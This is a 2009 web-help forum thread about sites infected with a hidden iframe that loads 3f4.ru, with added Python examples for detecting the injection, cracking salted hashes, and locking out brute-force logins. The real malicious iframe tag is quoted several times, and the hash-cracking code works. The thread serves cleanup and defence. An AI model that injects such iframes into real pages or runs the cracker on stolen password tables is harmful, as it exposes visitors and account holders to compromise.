Hooch Posted August 15, 2009

Hello all. I have a client who was hacked. All their websites under the one package they have were compromised. So I have to wonder if they cracked their cPanel password. The problem that has occurred is that an iframe was entered into the code of every index.php and every index.html page on all the sites, even in sub folders. I went and deleted all the code, but it shows back up again after some time. Here's the code...

    <iframe src="http://3f4.ru:8080/index.php" width=151 height=198 style="visibility: hidden">

Any idea how this would have happened? I'm not sure if it would be through the cPanel or maybe it would be a form I created? Or was the web provider hacked? And if anyone has experience with this, how do I find the hole? I did email the provider's abuse dept., but a quick response from here may save downtime. Thank you
boen_robot Posted August 15, 2009

If it's at the very bottom of your PHP and HTML files, i.e.

    <?php
    // PHP code here
    ?>
    <iframe src="http://3f4.ru:8080/index.php" width=151 height=198 style="visibility: hidden"></iframe>

then it's unlikely that a form you created is the reason... unless you have a form that lets users edit files on the server. If you have such a form, it's possible that the attacker worked around your defences in it to alter PHP files. Otherwise, cracking your FTP and/or cPanel accounts is the more likely cause. Change your password at those places, and make sure it's a strong password too. If you use third-party CMSes (WordPress, Joomla, IPB, etc.), upgrade them to their latest versions, as it is possible that a security hole in THEM led to the demise of your own files.
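Finding every copy of the injection (and where in each file it sits) is the first thing to do before cleaning, and the reply above points out that the placement is itself a clue. The scanner below is an added example, not code from the thread or from cPanel: it walks a web root, flags any iframe whose inline style hides it, reports whether it sits right after the opening body tag or at the end of the file, and can strip it. The sample site it builds in a temp directory is constructed for the demo; the only real string in it is the iframe tag the original post quotes.

```python
import os
import re
import tempfile

# Hidden iframe as described in the thread: an <iframe> whose inline style
# hides it (visibility: hidden or display: none).  The trailing closer is
# optional and may be the malformed "<iframe>" the reply shows.
HIDDEN_IFRAME = re.compile(
    r'<iframe\b[^>]*?(?:visibility\s*:\s*hidden|display\s*:\s*none)[^>]*>'
    r'\s*(?:</?iframe\s*>)?',
    re.IGNORECASE | re.DOTALL,
)
SRC_ATTR = re.compile(r'src\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)
SCAN_EXTENSIONS = {".php", ".html", ".htm"}


def classify_placement(text, start, end):
    """Where the injection sits: the thread reports two spots, right after
    the opening <body> tag (HTML files) and at the very end (PHP files)."""
    before = text[:start].rstrip()
    after = text[end:].strip()
    if not after:
        return "end_of_file"
    if re.search(r'<body\b[^>]*>$', before, re.IGNORECASE):
        return "after_body_open"
    return "elsewhere"


def find_injections(text):
    """Return [(src, placement), ...] for every hidden iframe in text."""
    findings = []
    for m in HIDDEN_IFRAME.finditer(text):
        src = SRC_ATTR.search(m.group(0))
        placement = classify_placement(text, m.start(), m.end())
        findings.append((src.group(1) if src else "", placement))
    return findings


def remove_injections(text):
    """Return (cleaned_text, number_removed)."""
    return HIDDEN_IFRAME.subn("", text)


def scan_tree(root):
    """Walk root and map each infected file (relative path) to its findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCAN_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = find_injections(fh.read())
            if findings:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = findings
    return report


# The tag quoted in the original post, including the malformed closer.
INJECTED = ('<iframe src="http://3f4.ru:8080/index.php" width=151 height=198 '
            'style="visibility: hidden"><iframe>')

# Constructed sample site (not the client's files): one HTML file injected
# after <body>, one PHP file in a sub folder injected at the end, one clean
# file, and one legitimate visible iframe that must not be flagged.
SAMPLE_FILES = {
    "index.html": "<html><body>\n" + INJECTED + "\n<h1>Welcome</h1>\n</body></html>\n",
    "sub/index.php": "<?php\necho 'hello';\n?>\n" + INJECTED + "\n",
    "clean.php": "<?php echo 'nothing to see'; ?>\n",
    "video.html": '<html><body><iframe src="https://example.com/embed" '
                  'width=560 height=315></iframe></body></html>\n',
}


def build_sample_site():
    """Write SAMPLE_FILES into a fresh temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for rel, findings in sorted(scan_tree(site).items()):
        for src, placement in findings:
            print(f"{rel}: hidden iframe -> {src} ({placement})")
```

Run it against the real document root with `scan_tree("/home/user/public_html")` (path is an assumption) and keep the report: a list of exactly which files were touched, and when (compare against `os.path.getmtime`), is what you need to correlate with the host's FTP and cPanel access logs. Cleaning alone will not hold while the access path is still open, which is what the reinfection in the original post already shows.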
Hooch Posted August 15, 2009

Thanks for that info. The index.html files had the code just after the body tag (opening tag). The index.php files had the code at the very bottom. I did change the passwords. I went to PCTools.com and created one there. Here's hoping it's fixed!!
Synook Posted August 16, 2009

If you have the option, also use SFTP instead of FTP, as it is more secure.
Hooch Posted August 16, 2009

Okay, thank you Synook. Any help here is very much appreciated. I had a question asked by one of the members: why would they hack us? Why do they want our information? I don't think this was for that. This was more for getting people to visit sites so the hacker can receive $$, correct? Can anyone shed light on what the reason may have been from that code above? Thank you
boen_robot Posted August 16, 2009

> Okay, thank you Synook. Any help here is very much appreciated. I had a question asked by one of the members: why would they hack us? Why do they want our information? I don't think this was for that. This was more for getting people to visit sites so the hacker can receive $$, correct? Can anyone shed light on what the reason may have been from that code above? Thank you

I think your assumption on ad revenue is a correct one. If your users click those ads, the attacker gets some cash. There's also one more thing to note though. The attacker detects success. He now knows there is a weak link in the chain that he can use to try and do some real damage, like stealing your users' passwords. And once they do that, they could try and use them on other sites to potentially get their banking information in the end and steal their money.
Hooch Posted August 16, 2009

I'm assuming the FTP was cracked. Not sure how, since it was a difficult one. If the cPanel PW was cracked, should I be worried and look for files they may have uploaded? Is this a normal practice? I am looking, but nothing found yet. If they have got ahold of the users table in the DB, those passwords were hashed and salted. How could they know what the PW is?
boen_robot Posted August 16, 2009

The answer to all of it - brute force attack. If they can get ahold of the users table, AND they know your exact hash types and salting algorithms, they can try all possible combinations until the hash matches. Same deal with FTP and cPanel - they try every possible password, and store it. You can easily write a program that does that. You can ask your host if they do some "auditing" on cPanel and FTP, i.e. if they block a certain IP after N unsuccessful login attempts per day.
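The reply above describes the offline attack on a stolen users table: with the salt and the hashing scheme in hand, the attacker simply guesses. The following added example (not code from the thread, and not the site's real scheme, which the thread never states) assumes the table stores hex(sha256(salt + password)) with a per-user salt, and runs a wordlist and then a short exhaustive search against three constructed rows. It shows what the salt does and does not buy: the common and the very short passwords fall immediately, the long random one survives, and the keyspace figure shows why.

```python
import hashlib
import itertools
import string


# Assumed scheme (the thread never says which one the site uses):
# digest = hex(sha256(salt + password)), one salt per user.
def hash_password(password, salt, algo="sha256"):
    return hashlib.new(algo, (salt + password).encode("utf-8")).hexdigest()


def dictionary_attack(target_hash, salt, wordlist, algo="sha256"):
    """Try each candidate with the known salt; return the match or None."""
    for guess in wordlist:
        if hash_password(guess, salt, algo) == target_hash:
            return guess
    return None


def brute_force(target_hash, salt, alphabet, max_len, algo="sha256"):
    """Exhaustive search up to max_len characters; returns (guess, tries).
    Cost per user is sum(len(alphabet)**n for n in 1..max_len) hashes."""
    tries = 0
    for n in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=n):
            tries += 1
            guess = "".join(chars)
            if hash_password(guess, salt, algo) == target_hash:
                return guess, tries
    return None, tries


def keyspace(alphabet_size, length):
    """Candidates an attacker must cover for passwords of exactly `length`."""
    return alphabet_size ** length


# Constructed rows, as if pulled from a stolen users table (not real data).
COMMON_WORDS = ["123456", "password", "qwerty", "letmein", "hooch", "welcome1"]
STOLEN_ROWS = [
    ("alice", "a1b2", hash_password("letmein", "a1b2")),        # in any wordlist
    ("bob", "c3d4", hash_password("7qz", "c3d4")),              # short: brute-forced
    ("carol", "e5f6", hash_password("wK9#vL2$pQ7m", "e5f6")),   # long, random
]


def crack_rows(rows):
    """Dictionary first, then a 3-character brute force; None = not recovered."""
    recovered = {}
    for user, salt, digest in rows:
        pw = dictionary_attack(digest, salt, COMMON_WORDS)
        if pw is None:
            pw, _ = brute_force(digest, salt, string.ascii_lowercase + string.digits, 3)
        recovered[user] = pw
    return recovered


if __name__ == "__main__":
    for user, pw in crack_rows(STOLEN_ROWS).items():
        print(f"{user}: {pw or 'not recovered'}")
    print("keyspace for 12 printable-ASCII characters:", keyspace(94, 12))
```

The salt stops a precomputed table from covering every user at once; it does nothing against guessing one user's weak password, which is why the advice in this thread to make users change reused passwords matters even though the table was salted. A deliberately slow hash (bcrypt, scrypt, PBKDF2) raises the per-guess cost, which is the other half of the defence.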
Hooch Posted August 16, 2009

Steps done so far:
1. Changed passwords for cPanel and FTP.
2. Changed password for the database.

To do:
1. Ask members of the site to change their password and also change passwords that are the same on other important sites (i.e. banking).
2. Look into blocking IPs after numerous login failures.

Anything else you would recommend? And thank you for your time and knowledge on this issue.
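The second to-do item, blocking an IP after repeated login failures, is the online counterpart of the brute-force discussion above. On shared cPanel hosting the FTP and cPanel logins themselves are the host's to protect (ask whether their brute-force protection is on, as the earlier reply suggests); for the site's own member login, which the thread also worries about, the policy can be enforced in the application. The guard below is an added example, not code from the thread: it locks an IP after N failures inside a sliding window, ignores a correct password while the lock is in force, and releases the lock when it expires. The clock is injectable, so the constructed event list replays in an instant.

```python
import time
from collections import defaultdict, deque


class LoginGuard:
    """Lock an IP out after max_failures failed logins inside window_seconds.
    The clock is injectable so the policy can be tested without sleeping."""

    def __init__(self, max_failures=5, window_seconds=600,
                 lockout_seconds=900, clock=time.time):
        self.max_failures = max_failures
        self.window = window_seconds
        self.lockout = lockout_seconds
        self.clock = clock
        self.failures = defaultdict(deque)   # ip -> timestamps of recent failures
        self.locked_until = {}               # ip -> time the lock expires

    def _prune(self, ip, now):
        q = self.failures[ip]
        while q and now - q[0] > self.window:
            q.popleft()

    def is_blocked(self, ip):
        now = self.clock()
        until = self.locked_until.get(ip)
        if until is not None:
            if now < until:
                return True
            del self.locked_until[ip]        # lock expired: start counting afresh
            self.failures[ip].clear()
        return False

    def record_failure(self, ip):
        """Register a failed attempt; returns True if this one triggered a lock."""
        now = self.clock()
        self._prune(ip, now)
        self.failures[ip].append(now)
        if len(self.failures[ip]) >= self.max_failures:
            self.locked_until[ip] = now + self.lockout
            return True
        return False

    def record_success(self, ip):
        self.failures[ip].clear()


def attempt_login(guard, ip, credentials_ok):
    """Gate one login attempt: 'blocked', 'ok' or 'failed'.
    The check happens before the password is even looked at."""
    if guard.is_blocked(ip):
        return "blocked"
    if credentials_ok:
        guard.record_success(ip)
        return "ok"
    guard.record_failure(ip)
    return "failed"


# Constructed login events (not a real log): (seconds offset, client ip,
# whether the submitted password was correct).  203.0.113.7 guesses five
# times, then submits the right password while locked; 198.51.100.9 is an
# unrelated client; at t=1000 the 900 s lock has expired.
EVENTS = [
    (0, "203.0.113.7", False), (1, "203.0.113.7", False), (2, "203.0.113.7", False),
    (3, "203.0.113.7", False), (4, "203.0.113.7", False),
    (5, "203.0.113.7", True),
    (6, "198.51.100.9", True),
    (1000, "203.0.113.7", True),
]


def replay(events, **policy):
    """Feed the events through a guard driven by a fake clock; return decisions."""
    state = {"t": 0.0}
    guard = LoginGuard(clock=lambda: state["t"], **policy)
    decisions = []
    for offset, ip, ok in events:
        state["t"] = float(offset)
        decisions.append((offset, ip, attempt_login(guard, ip, ok)))
    return decisions


if __name__ == "__main__":
    for offset, ip, decision in replay(EVENTS):
        print(f"t={offset:>4}s {ip:<14} {decision}")
```

Keep the counters somewhere shared (the database or a cache) rather than in a single process's memory on a real PHP host, and log the lock events: a burst of lockouts from one address after the passwords were changed is exactly the evidence worth sending to the provider's abuse department.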
Synook Posted August 16, 2009

What happened to using SFTP? Remember, if you use normal FTP your password is sent in plain to the server.
Hooch Posted August 17, 2009

That too :) Just checked... No SFTP.
walapu Posted August 17, 2009

http://whois.domaintools.com/3f4.ru

Try this maybe? There is a number. It is very odd, though, that each time you refresh the IP changes. After a few tries I got this one, 62.112.155.45; it seems to be the correct one. I did a whois search on the IP and it came up with this:

http://www.networksolutions.com/whois/resu...p=62.112.155.45

Then I managed to get this:

http://www.db.ripe.net/whois?form_type=sim...o_search=Search